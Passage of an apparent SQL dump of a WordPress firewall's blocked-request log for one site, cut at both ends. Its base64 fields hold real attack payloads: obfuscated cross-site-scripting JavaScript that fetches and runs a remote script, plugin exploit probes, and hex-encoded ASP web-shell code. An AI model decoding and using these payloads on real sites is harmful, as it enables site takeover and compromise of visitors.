Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37760,1569949567.168494,1569949565.315100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD48c2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37800,1569949610.680577,1569949609.093400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37829,1569949894.001234,1569949892.536400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37830,1569949891.678978,1569949889.810500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37831,1569949888.429762,1569949887.156400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37832,1569949885.732399,1569949884.190200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37833,1569949883.314387,1569949882.137800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37834,1569949881.304475,1569949879.993100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37835,1569949879.129565,1569949877.823200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37836,1569949876.879368,1569949875.890400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37844,1569950013.654611,1569950012.841300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37916,1570674540.920781,1570674539.735000,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//statics/images/cache.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYjIwMTRd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9zdGF0aWNzL2ltYWdlcy9jYWNoZS5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37887,1570544455.261027,1570544454.374800,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//config/AspCms_Config.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5WyNd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9jb25maWcvQXNwQ21zX0NvbmZpZy5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37845,1569950011.682100,1569950010.675600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37846,1569950009.867134,1569950008.363100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37704,1569411865.602183,1569411864.806600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37893,1570544590.524982,1570544589.642400,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//statics/images/cache.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYjIwMTRd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG